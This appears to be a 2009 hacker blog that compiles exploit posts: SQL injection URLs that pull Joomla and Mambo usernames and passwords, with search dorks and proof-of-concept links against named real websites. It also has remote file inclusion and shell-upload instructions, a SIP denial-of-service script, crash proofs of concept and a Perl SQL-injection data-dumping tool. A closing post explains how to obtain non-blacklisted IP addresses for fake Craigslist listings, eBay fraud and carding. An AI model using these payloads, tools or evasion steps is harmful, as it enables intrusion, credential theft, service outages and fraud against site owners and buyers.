merry christmas 2009 and happy new year 2010

Praying the blessings of the season
will refresh you this Christmas and
throughout the coming year

Read More

Eurologon CMS SQL Injection Vuln

Software : Eurologon Content Management System
Vendor : http://www.content-manager.it/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/

[o] Vulnerable file
links.php

[o] Exploit
http://localhost/[path]/links.php?id=[SQL]

[o] Proof of concept
http://www.ream.it/links.php?id=5+AND+1=2+UNION+SELECT+1,2,3,4,version(),6/*
http://www.fondazionefabretti.it/links.php?id=21+AND+1=2+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14/*

[o] Dork
"Powered by Eurologon"

[o] Notes
this is a private script.

Read More

Joomla Component com_lyftenbloggie Remote SQL injection vulnerability

#############################################################################################
## Joomla Component com_lyftenbloggie Remote SQL injection vulnerability - (author) ##
## Author : kaMtiEz (kamzcrew[at]yahoo[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : November 11, 2009 ##
#############################################################################################

[ Software Information ]

[+] Vendor : http://www.lyften.com/
[+] Download : http://www.lyften.com/products/lyftenbloggie/download/id-10.html
[+] Description : LyftenBloggie is a blog publishing component for Joomla 1.5. LyftenBloggie is both free and opensource.
[+] version : 1.0.4 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_lyftenbloggie" / "Powered by LyftenBloggie"
[+] LOCATION : INDONESIA - JOGJA

#############################################################################################

[ Vulnerable File ]

http://server/index.php?option=com_lyftenbloggie&author=[ValidID][INDONESIANCODER]

[ Exploit ]

http://server/index.php?option=com_lyftenbloggie&author=62+union+select+1,concat_ws(0x3a,username,password),3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users--

#############################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,Jack- and YOU!!

[ NOTE ]

[+] Babe enyak adek i love u pull dah ..
[+] Setelah Bertapa kagak jelas sama Om Don Tukuesto ... akhirnya nemu lobang :D
[+] M3NW5 Ku tunggu di kotaku ... wkwkwkw

[ QUOTE ]

[+] kaMtiEz -=- Don Tukulesto -=- M3NW5 -=- 30 hari mencari AuraKasih Ntah di mana kao sekarang sayang ..
[+] AURAKASIH telpon gua yach .. hha

Read More

Flashden Shell Upload Vulnerability

# Exploit Title: Flashden Shell Upload Vulnerability

# Date: 26.12.2009

# Author: DigitALL

# Greetz: Zombie KroNickq HackSpy and ALL 1923Turk.Biz Members

# Vendor: http://www.jurgenvisser.nl

# Version: 2.0

# Dork: inurl:"select_file2.php"

# Application: Please Add Files ( Your Shell ) And Upload.

# Shell: /test/shell.php -- /up/shell.php -- /upload/shell.php -- /beta/shell.php OR one back dir.

Read More

Idul-Adha 1428H

selamat merayakan idul adha 1428 H

Read More

Spider Solitaire local crash proof of concept exploit for Windows XP SP2.

/*
Spider Solitaire (Windows XP SP2) Local Crash PoC
By SirGod
www.insecurity.ro
www.twitter.com/SirGod
Loading a corrupt save file(spider.sav) will result in a local crash
of Spider Solitaire
*/
$username="pwn"; //Replace with your computer username
$file="spider.sav";
$junk="Spider Solitaire Local Crash";
$handle = fopen($file, 'w') or die("Can't create file");
fwrite($handle,$junk);
fclose($handle);
$file2="C:/Documents and Settings/" .$username. "/My Documents/spider.sav";
if(!copy($file,$file2))
{
die("Can't copy file");
}
else
{
echo "File succesfully copied.Open Spider Solitaire and load the
last saved game";
};
?>

Read More

ZoIPer v2.22 Call-Info Remote Denial Of Service

#!/usr/bin/python

# ZoIPer v2.22 Call-Info Remote Denial Of Service.
# Remote Crash P.O.C.
# Author: Tomer Bitton (Gr33n_G0bL1n)
# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10
#
# Vendor Notified on: 21/09/2009
# Vendor Fix: Fixed in version 2.24 Library 5324
#
# Bad Chars: \x20 , \x09

import sys
import socket
import os


def main(argc , argv):

if len(sys.argv) != 2:
os.system("cls")
sys.exit("Usage: " + sys.argv[0] + " \n")

target_host = sys.argv[1]
target_port = 5060

evil_packet =
"\x49\x4e\x56\x49\x54\x45\x20\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31"+\
"\x30\x2e\x30\x2e\x30\x2e\x31\x20\x53\x49\x50\x2f\x32\x2e\x30\x0d"+\
"\x0a\x56\x69\x61\x3a\x20\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44"+\
"\x50\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31"+\
"\x3a\x31\x32\x39\x38\x3b\x62\x72\x61\x6e\x63\x68\x3d\x7a\x39\x68"+\
"\x47\x34\x62\x4b\x4a\x52\x6e\x54\x67\x67\x76\x4d\x47\x6c\x2d\x36"+\
"\x32\x33\x33\x0d\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72\x64"+\
"\x73\x3a\x20\x37\x30\x0d\x0a\x46\x72\x6f\x6d\x3a\x20\x4d\x6f\x72"+\
"\x70\x68\x65\x75\x73\x20\x3c\x73\x69\x70\x3a\x4d\x6f\x72\x70\x68"+\
"\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31"+\
"\x33\x31\x3e\x3b\x74\x61\x67\x3d\x66\x37\x6d\x58\x5a\x71\x67\x71"+\
"\x5a\x79\x2d\x36\x32\x33\x33\x0d\x0a\x54\x6f\x3a\x20\x4e\x65\x6f"+\
"\x20\x3c\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31\x30\x2e\x30\x2e\x30"+\
"\x2e\x31\x3e\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20\x77\x53"+\
"\x48\x68\x48\x6a\x6e\x67\x39\x39\x2d\x36\x32\x33\x33\x40\x31\x39"+\
"\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31\x0d\x0a\x43\x53"+\
"\x65\x71\x3a\x20\x36\x32\x33\x33\x20\x49\x4e\x56\x49\x54\x45\x0d"+\
"\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x3c\x73\x69\x70\x3a\x4d"+\
"\x6f\x72\x70\x68\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e"+\
"\x35\x37\x2e\x31\x33\x31\x3e\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74"+\
"\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69"+\
"\x6f\x6e\x2f\x73\x64\x70\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x6e\x66"+\
"\x6f\x3a\x20\x20\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c"+\
"\x65\x6e\x67\x74\x68\x3a\x20\x31\x32\x35\x0d\x0a\x0d\x0a"

os.system("cls")
print "[+] ZoIPer Call-Info Remote Denial Of Service\r\n"
print "[+] Exploited By Gr33n_G0bL1n\r\n"
print "[+] Connecting to %s on port %d\r\n" % (target_host,target_port)

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect((target_host,target_port))
print "[+] Trying To Send Evil Packet...\r\n"
s.sendall(evil_packet)
s.close()
print "[+] Done!\r\n"
except:
print "[x] Connection Error!\r\n"


if (__name__ == "__main__"):
sys.exit(main(len(sys.argv), sys.argv))

Read More

PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 10.07.2009
- - Pub.: 06.08.2009

Risk: High

Affected Software:
- - PHP 5.3.0
- - PHP 5.2.10

Original URL:
http://securityreason.com/achievement_securityalert/65

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.

http://lu2.php.net/manual/en/function.ini-restore.php

ini_restore ? Restores the value of a configuration option

ini_restore ( string $varname )

- --- 1. PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ---
The main problem exist in restoring php config environments. To demonstrate
the problem, we need to declare variables via ini_set() function. When we
try use ini_restore(), variables in class PG() will indicate any part of
memory.

- ---zend_ini.c---
static int zend_restore_ini_entry_cb(zend_ini_entry *ini_entry, int stage
TSRMLS_DC) /* {{{ */
{
if (ini_entry->modified) {
if (ini_entry->on_modify) {
zend_try {
/* even if on_modify bails out, we have to continue on with restoring,
since there can be allocated variables that would be freed on MM
shutdown
and would lead to memory corruption later ini entry is modified again
*/
ini_entry->on_modify(ini_entry, ini_entry->orig_value,
ini_entry->orig_value_length, ini_entry->mh_arg1, ini_entry->mh_arg2,
ini_entry->mh_arg3, stage TSRMLS_CC);
} zend_end_try();
}
if (ini_entry->value != ini_entry->orig_value) {
efree(ini_entry->value);
}
ini_entry->value = ini_entry->orig_value;
ini_entry->value_length = ini_entry->orig_value_length;
ini_entry->modified = 0;
ini_entry->orig_value = NULL;
ini_entry->orig_value_length = 0;
if (ini_entry->modifiable >= (1 << 3)) {
ini_entry->modifiable >>= 3;
}
}
return 0;
}
- ---zend_ini.c---

Flag modified will be reset, and we can not considered modified variable.
We don't check value of ini_entry->on_modify() and PG() will be now out of
memory range.

To demonstrate this issue

- ---example0 (5.2.10/5.3.0)---
127# uname -a && php -v
OpenBSD 127.cxib 4.6 GENERIC#0 i386
PHP 5.2.10 with Suhosin-Patch 0.9.7 (cli) (built: Jul 5 2009 21:43:12)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2009 Zend Technologies
with Suhosin v0.9.27, Copyright (c) 2007, by SektionEins GmbH
127# cat /var/www/www/sess.php

ini_set("session.save_path", "0123456789ABCDEF");
ini_restore("session.save_path");
session_start();
?>
127# php /var/www/www/sess.php AAA
PHP Warning: session_start():
open($­|456789ABCDEF/sess_c7lv2k3bndfi25mhohq0nm7s06, O_RDWR) failed: No
such file or directory (2) in /var/www/www/sess.php on line 5
PHP Warning: Unknown:
open($­|456789ABCDEF/sess_c7lv2k3bndfi25mhohq0nm7s06, O_RDWR) failed: No
such file or directory (2) in Unknown on line 0
PHP Warning: Unknown: Failed to write session data (files). Please verify
that the current setting of session.save_path is correct ($­|ma: no-cache)
in Unknown on line 0
127# php /var/www/www/sess.php
PHP Warning: session_start():
open(¤^j|456789ABCDEF/sess_o9urrs37iabfg3tqvjuh07c1l1, O_RDWR) failed: No
such file or directory (2) in /var/www/www/sess.php on line 5
PHP Warning: Unknown:
open(¤^j|456789ABCDEF/sess_o9urrs37iabfg3tqvjuh07c1l1, O_RDWR) failed: No
such file or directory (2) in Unknown on line 0
PHP Warning: Unknown: Failed to write session data (files). Please verify
that the current setting of session.save_path is correct (¤^j|ma: no-cache)
in Unknown on line 0
- ---example0 (5.2.10/5.3.0)---

The main problem is started in ini_restore("session.save_path"). To show
this issue, we need use some function with PG() inside (like:
session_start()).

- ---example1 (5.3.0)---
127# uname -mrs && php -v
NetBSD 5.0 i386
PHP 5.3.0 (cli) (built: Jul 15 2009 23:47:25)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyrght (c) 1998-2009 Zend Technologies
127# cat /www/file.php
ini_set("open_basedir", "A");
ini_restore("open_basedir");
ini_get("open_basedir");


include("B");

?>

127# php /www/file.php
PHP Warning: include(): open_basedir restriction in effect. File(B) is not
within the allowed path(s): (4?e»X?p») in /www/file.php on line
7

Warning: include(): open_basedir restriction in effect. File(B) is not
within the allowed path(s): (4?e»X?p») in /www/file.php on line
7
PHP Warning: include(B): failed to open stream: Operation not permitted in
/www/file.php on line 7

Warning: include(B): failed to open stream: Operation not permitted in
/www/file.php on line 7
PHP Warning: include(): Failed opening 'B' for inclusion
(include_path='.:/usr/pkg/lib/php') in /www/file.php on line 7

Warning: include(): Failed opening 'B' for inclusion
(include_path='.:/usr/pkg/lib/php') in /www/file.php on line 7

127# curl http://localhost/file.php


Warning: include() [href='function.include'>function.include]: open_basedir restriction in
effect. File(B) is not within the allowed path(s): (°?e»Hup») in
/www/file.php on line 7



Warning: include(B) [href='function.include'>function.include]: failed to open stream:
Operation not permitted in /www/file.php on line 7



Warning: include() [href='function.include'>function.include]: Failed opening 'B' for
inclusion (include_path='.:/usr/pkg/lib/php') in /www/file.php on
line 7

- ---example1 (5.3.0)---

Variable PG(open_basedir) is now out of range. So any function (like:
include()) with

php_error_docref(NULL TSRMLS_CC, E_WARNING, "open_basedir restriction in
effect. File(%s) is not within the allowed path(s): (%s)", path,
PG(open_basedir));

will print memory

examples:
- ---
Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (¤©f»ESSID) in
/www/ssij.php on line 8

Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (,ªf»aaaaaa) in
/www/ssij.php on line 8

Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (?¬f»ESSID) in
/www/ssij.php on line 8

Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (ÈËe»ef_root)
in /www/ssij.php on line 8

Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (4Íe»r.ini) in
/www/ssij.php on line 8
- ---

Variables in class PG, may take any value.
So code such as

if (PG(open_basedir) && php_check_open_basedir(new_value TSRMLS_CC))

can be manipulated.

But not only zend_ini.c have issue. When we try use ini_set() and
ini_restore() for error_log, php will crash.

Function OnUpdateErrorLog, dosen't check that new_value is empty (null
point). It should provide to crash.

- ---main.c---
static PHP_INI_MH(OnUpdateErrorLog)
{
...
/* Only do the safemode/open_basedir check at runtime */
if ((stage == PHP_INI_STAGE_RUNTIME || stage == PHP_INI_STAGE_HTACCESS)
&& strcmp(new_value, "syslog")) {
...
- ---main.c---

strcmp(3) will check new_value. So new_value can not be NULL.

here:

STD_PHP_INI_ENTRY("error_log", NULL, PHP_INI_ALL, OnUpdateErrorLog,
error_log, php_core_globals, core_globals)


default error_log is NULL

...("error_log", NULL,...

so if we put some string, and remove it, php should crash

127# php -r 'ini_set("error_log","A");ini_restore("error_log");'
Segmentation fault (core dumped)

127# gdb -q php
(gdb) r -r 'ini_set("error_log","A");ini_restore("error_log");'
Starting program: /usr/local/bin/php -r
'ini_set("error_log","A");ini_restore("error_log");'

Program received signal SIGSEGV, Segmentation fault.
0x288ee410 in strcmp () from /lib/libc.so.7

bt:
#0 0x288ee410 in strcmp () from /lib/libc.so.7
#1 0x081c7b85 in OnUpdateErrorLog (entry=0x28a65a80, new_value=0x0,
new_value_length=3, mh_arg1=0x38, mh_arg2=0x83d5420, mh_arg3=0x0,
stage=16)
at /usr/ports/lang/php5/work/php-5.3.0/main/main.c:354
#2 0x0824cb85 in zend_restore_ini_entry_cb (ini_entry=0x28a65a80,
stage=16)
at /usr/ports/lang/php5/work/php-5.3.0/Zend/zend_ini.c:55
#3 0x0824d3f5 in zend_restore_ini_entry (name=0x28a1e36c "error_log",
name_length=10, stage=16)
...

Functions like OnUpdateErrorLog, should check, that new_value is not a NULL
pointer.

- --- 2. Fix ---
(5.3.0):
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/Zend/zend_ini.c
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/main/main.c

(5.2.10):
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/Zend/zend_ini.c
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/main/main.c

- --- 3. Greets ---
stas

sp3x Infospec Chujwamwdupe p_e_a pi3

- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib {a.t] securityreason [d00t} com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAkp7FoMACgkQpiCeOKaYa9YWFwCbBhEvA69nQDgwXyuDdU8wbjmu
ZIEAniHiQ3puTKqEtw9u8g6/T/806j7A
=DvtO
-----END PGP SIGNATURE-----

Read More

playSMS ver 0.9.4 RFI & LFI Vulnerability

[o]====================================[o]
[x] playSMS version 0.9.4 [x]
[x] RFI&LFI Vulnerability [x]

Download:http://playsms.sourceforge.net/ 167.9 KB
Date : 14 Oct 2009
[o]====================================[o]

file: /lib/function.php

// main functions
include "$apps_path[libs]/fn_logger.php"; line 4
include "$apps_path[libs]/fn_auth.php"; line 5
include "$apps_path[libs]/fn_user.php"; line 6
include "$apps_path[libs]/fn_sendsms.php"; line 7
include "$apps_path[libs]/fn_sendmail.php"; line 8
include "$apps_path[libs]/fn_phonebook.php"; line 9
include "$apps_path[libs]/fn_core.php"; line 10
include "$apps_path[libs]/fn_themes.php"; line 11

// init global variables
include "$apps_path[libs]/lib_init1.php"; line 14

// custom functions before plugins loading
include "$apps_path[libs]/fn_custom1.php"; line 17

// init global variables
include "$apps_path[libs]/lib_init2.php"; line 65

// custom functions before plugins loading
include "$apps_path[libs]/fn_custom2.php"; line 68

http://localhost/[path]/lib/function.php?apps_path[libs]=[tutung-RFI]

[o]====================================[o]

file: /plugin/themes/default/init.php

include $apps_path[themes]."/".$themes_module."/config.php";
include $apps_path[themes]."/".$themes_module."/fn.php"; line 3

http://localhost/[path]/plugin/themes/default/init.php?apps_path[themes]=[tutung-RFI]
http://localhost/[path]/plugin/themes/default/init.php?themes_module=[tutung-LFI]

[o]====================================[o]

file: /plugin/gateway/gnokii/init.php

include "$apps_path[plug]/gateway/$gateway_module/config.php"; line 2
include "$apps_path[plug]/gateway/$gateway_module/fn.php"; line 3

http://localhost/[path]/plugin/gateway/gnokii/init.php?apps_path[plug]=[tutung-RFI]
http://localhost/[path]/plugin/gateway/gnokii/init.php?gateway_module=[tutung-LFI]

[o]====================================[o]

i think bug was publish by
ahmadbady [kivi_hacker666@yahoo.com] at playSMS version 0.9.3
but vendor still don't have update the bug at playSMS version 0.9.4,
so it's not same version right? :D

colek-colek
: All Brotha Antisecurity[dot]Org www.MainHack.net www.ServerIsDown.org
Jack-, Vrs_hCk, OoN_Boy, NoGe, zxvf, Yadoy666, s3t4n, r3v4n_b4st4rd,
pizzyroot,
em|nem, s4va,
kecemplungkalen, xr00tb0y
xshadow, Tante Angela Chang, IrcMafia
Indonesian Coder
Don Tukulesto, M3NW5, m364tr0n, cyb3r_tr0n

./noname

[o]====================================[o]

Read More

jasakom has been hacked

Read More

Redcat Media SQL Injection Vulnerability

x]==========================================[x]
| AntiSecurity[dot]org |
[x]==========================================[x]
[x]==========================================[x]

| Title : redcat media (inurl:index.php?contentId=) SQL Injection Vulnerability
| Vendor : http://www.redcatmedia.co.uk/
| Date : 2 oktober 2009 ( Indonesia )
| Author : s4va
| Contact : sava_sword@yahoo.com
| Blog : http://s4vaworld.uni.cc

[x]==========================================[x]

| Dork : “Powered by RedCat” inurl:index.php?contentId=

[x]==========================================[x]

| Exploit
| http://target/index.php?contentId=[sql]

[x]==========================================[x]

| Proof of concept
|
http://www.5ringstelecom.com/index.php?contentId=-26%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17–

[x]==========================================[x]

| THX TO:
|blackstar ; x-shadow ; cr4wl3r ; bl4ck_3n91n3 ; k0il ; inc0mp13te ; [...]

Read More

Community Translate RFI Vuln

[o] Community Translate Remote File Inclusion Vulnerability
Software : Community Translate
Project Home : http://code.google.com/p/communitytranslate/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/

[o] Vulnerable file
require_once("$rd/include/utilfunctions.php");

include/functions.php

[o] Exploit
http://localhost/[path]/include/functions.php?rd=[evilc0de]

Read More

Dazzle Blast RFI Vuln

[o] Dazzle Blast Remote File Inclusion Vulnerability
Software : Dazzle Blast
Download : http://www.dazzleblast.com/dazzleblast.zip
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/

[o] Vulnerable file
require_once($ROOTDIR.'admin/functions/general.php');

admin/includes/createemails.php


[o] Exploit
http://localhost/[path]/admin/includes/createemails.php?ROOTDIR=[evilc0de]

Read More

Simple SQLi Dumper (SSDp) v0.1 GUI

take from c0li.m0de.0n

<?

#!/usr/bin/perl



# Simple SQLi Dumper (SSDp) v2.2

# Coded by Vrs-hCk

# ander[at]antisecurity.org

# Anti Security Team



# Example: http://localhost/index.php?id=-1+union+select+1,2,3,c0li,5



use HTTP::Request;

use LWP::UserAgent;



my $c0de = "0x63306C69";

my $logo = "SSDp";



print "\n *************************************\n";

print " *       Simple SQLi Dumper 2.2      *\n";

print " *          Coded By Vrs-hCk         *\n";

print " *  MainHack.net - AntiSecurity.org  *\n";

print " *************************************\n\n";



print " [$logo] SQLi URL (c0li inside) : "; chomp ($sqli = );

print " [$logo] SQLi End Tag : "; chomp ($sql_end = );



print " [$logo] DB Name (leave blank for use current db) : "; chomp ($db_name = );

print " [$logo] Table Name : "; chomp ($table_name = );

print " [$logo] Columns Name (separate by comma char) : "; chomp ($columns = );



print " [$logo] Start Limit : "; chomp ($id_start = );

print " [$logo] Stop Limit : "; chomp ($id_end = );

print " [$logo] Log File : "; chomp ($sql_log = );



print "\n [$logo] DUMPING DATA ...\n\n";



my $concat = "CONCAT(".$c0de.",CONCAT_WS(0x3a,$columns),".$c0de.")";

my $query = str_replace($sqli,"c0li",$concat);

print " [$logo] [$table_name] $columns :\n\n";



for ($id=$id_start; $id<=$id_end; $id++) { 	my $exploit = $query."+FROM+".$db_name.".".$table_name."+LIMIT+".$id.",1".$sql_end; 	if ($db_name eq "") { $exploit = $query."+FROM+".$table_name."+LIMIT+".$id.",1".$sql_end; } 	my $res = get_content($exploit); 	if ($res =~ m/c0li(.+?)c0li/g) { 		my $data = $1; 		open(DAT,">>$sql_log") || die(" [$logo] Cannot Open File.\n");

		print DAT "$data\n";

		close(DAT);

		print " [$logo] ID ($id) $data\n";

	}

}



print "\n [$logo] Finish.\n\n";



sub str_replace {

	my $source  = shift;

	my $search  = shift;

	my $replace = shift;

	$source =~ s/$search/$replace/ge;

	return $source;

}



sub get_content() {

	my $url = $_[0];

	my $req = HTTP::Request->new(GET => $url);

	my $ua  = LWP::UserAgent->new();

	$ua->timeout(10);

	my $res = $ua->request($req);

	if ($res->is_error){

		print " [$logo] ID [timeout]\n";

	}

	return $res->content;

}



# AntiSecurity.org [10-09-2009]

Read More

Metasploit Framework

Metasploit provides useful information to people who
perform penetration testing,IDS signature development,
and exploit research. This project was created to
provide information on exploit techniques and to
create a useful resource for exploit developers
and security professionals. The tools and information
on this site are provided for legal security research
and testing purposes only.Metasploit is a community project

managed by Metasploit LLC.



Metasploit 3.3 for WIN.32

Metasploit 3.3 for UNIX

Read More

BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2

#!/usr/bin/env python

########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Plug-In, Add our zip, Boom.
#
########################################################################

buff = ("\x41" * 10000)

f1 = open("BigAntPlugIn.zip","w")
f1.write(buff)
f1.close()

Read More

Mambo/Joomla SQL Injection Vulneralbility

#######################################################
## Mambo/Joomla SQL Injection Vulneralbility ##
## Component : com_tupinambis ##
## Release : September 23, 2009 ##
## --------------------------------------------------##
##.---..-..-..-.,-..-..-..-. .---..---..---..----. ##
##`| |'| || || . < | || || |__ | |- \ \ `| |'| || | ##
## `-' `----'`-'`-'`----'`----'`---'`---' `-' `----' ##
##-------------------------------------------------- ##
#######################################################

[+] Author : Don Tukulesto
[+] Homepage : http://www.indonesiancoder.com
[+] Location : Republik Indonesia

#######################################################

[ Software Information ]

[+] Software : com_tupinambis
[+] Version : 1.0
[+] Vendor : www.tupinambis.net
[+] Download :
http://www.onestopjoomla.com/extensions/auction/tupinambis/
[+] Vulnerability : SQL Injection
[+] Google Dork : xxxxxxx

#######################################################
[ ExPL0!T ]

[+] Mambo :
http://127.0.0.1/index.php?option=com_tupinambis&task=verproyecto&proyecto=
-666+union+select+1,2,3,concat_ws(0x3a,username,password)tukulesto,5,6,7,8,
9,10,11+from+mos_users--

[+] Joomla :
http://127.0.0.1/index.php?option=com_tupinambis&task=verproyecto&proyecto=
-666+union+select+1,2,3,concat_ws(0x3a,username,password)tukulesto,5,6,7,8,
9,10,11+from+jos_users--

#######################################################

[ Greetings ]

[+] All of Indonesian Coder Member, M3NW5, mistersaint, gonzhack, m364tr0n,
cyb3r_tr0n, TUCKER, Petrucii, Chercut,
Senot, Joker, Quick_5ilv3r, ran, m4ho666, Den Bayan, vyc0d, bh4nd55,
Den Awink
[+] All of Surabayahackerlink Member, Awan, Plaque, rey_cute, Tuex, XNITRO,
DraCoola.com
[+] ServerIsDown.org, Jack-, Yadoy666 + tante Miya, kecemplungkalen,
xshadow, H4ck3rKu
[+] Kill-9 Crew, kaMtiEz, Arianom, Pathloader, tiw0L,
[+] V3n0m, Str0ke, sp3x, todd, Antisecurity.org, and YOU !!!

[ SHOUT ]

Happy Eidul Fitri 1430H.

Minal Aidin Wal Faidzin.

[ SP3C!AL ]

lovely Emak, Bapak, Adek ku sayang (^_^)

Read More

Joomla Component com_fastball (league) Remote SQL Injection Vulnerability

###########################################################################
##################################
## Joomla Component com_fastball Remote SQL injection vulnerability -
(league) ##
## Author : kaMtiEz (kamzcrew[at]gmail[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : September 23, 2009 ##
###########################################################################
##################################
# Hello My Name Is :
##
# __ _____ __ ._____________
##
# | | _______ / \_/ |_|__\_ _____/_______
##
# | |/ /\__ \ / \ / \ __\ || __)_\___ /
##
# | < / __ \_/ Y \ | | || \/ /
##
# |__|_ \(____ /\____|__ /__| |__/_______ /_____ \
##
# \/ \/ \/ \/ \/ -=- INDONESIAN CODER
-=- KILL-9 CREW -=- ##
###########################################################################
##################################

[ Software Information ]

[+] Vendor : http://www.fastballproductions.com/
[+] Download :
http://www.fastballproductions.com/index.php?option=com_digistore&task=list
_products&id=1&Itemid=32
[+] version : 1.1.0 - 1.2
[+] Vulnerability : SQL injection
[+] Dork : xxxxxxx
[+] Location : INDONESIA
###########################################################################
##################################

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_fastball&league=[INDONESIANCODER]

[ Exploit ]

-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+f
rom+jos_users--



###########################################################################
##################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,devil_nongkrong
and YOU!!

[ NOTE ]

[+] makasih buad babe and enyak .... muach ..
[+] makasih buat om tukulesto yg menemani saia selalu dan enggak bosen ma
gue .. hahaha
[+] aurakasih napa sih lo susah banget di hubungi ?? .. hha

Read More

How to hide your IP

I know many of you hiding ip's via Socks or poxy..that's shit...sorry but if they have java they can get ur ip even if u are connected thrhough a socks.

So. If u have a good connection at internet you can use this softwares:

1. Local ip > AOL ( using aol 9.1 or AOL desktop 10.)
To configure your ip to use AOL USA ip class you have to do go to:
Open Aol 9.1 > Connection options > Advanced Broadband Settings > continue > & at Broadband u will see something " You are curently editing settings for Broadband, than click and go down to Add a Broadband profile > Put any profil name you want > than down to Connection Type click on Home Network. and SAVE

This is how you get IP privat from AOL.

BUT what you guys didnt know and I am 100% sure about that...AOL have their ip in black list. So to have a PURE and NON blacklisted IP from AOL after you have did this setup you have to:

Connect using this settings, test your ip at [url="http://www.showmyip.com/?version=full"]http://www.showmyip.com/?version=full[/url] and see if ur ip address is from United States verified, if yes than disconect close AOL from taskmanager anything that AOL have than

Download AOL DEsktop ( AOL 10 ), install and make the same connection settings IF those settings are not already same as AOL 9.1. after that DONT open AOL desktop

Open AGAIN aol 9.1 from program files > aol 9.1 > waol.exe than try to connect, You will get an error first time but second time it will work

Usualy 70% of times it will give u an ip with 172.191, 172.192, 172.193 many of those IP's are not in blacklist

For those who is making fake auctions on Craiglist, you might need to know this way u will NOT have to register and make phone registration...YOU dont need to register..you can put FREE POST on AUTOS with no phone required or no Craigslist account

For those who Are making fraud on Ebay same thing...this non blacklist aol put you on website in like 2 hours instead of 8 or not puting u at all on ebay Autos.


Some times XP or VISTA dont kick AOL even if u are kicked from task manager so...Better on carding make a new User on your computer for example
AOL1 pass AOL1. than open AOL 9.1 as I said only after you have downloaded and instaled AOL 10 and than u will see first time NON BLACK listed AOL IP :D pure and simple...after you have done and you have disconected and reconected and didnt gave you a non black listed IP, try few more times 1 2, if not than delete user aol1 and make aol2 and so on :) NEW ip non black listed...

To test if your ip is in black list the easyest way go to this link

https://post.craigslist.org/chi/S/cto/

If you get this "You need to have a craigslist account to post to cars & trucks - by owner on chicago craigslist. " than be sure ur ip is 100% in BLACK LIST.

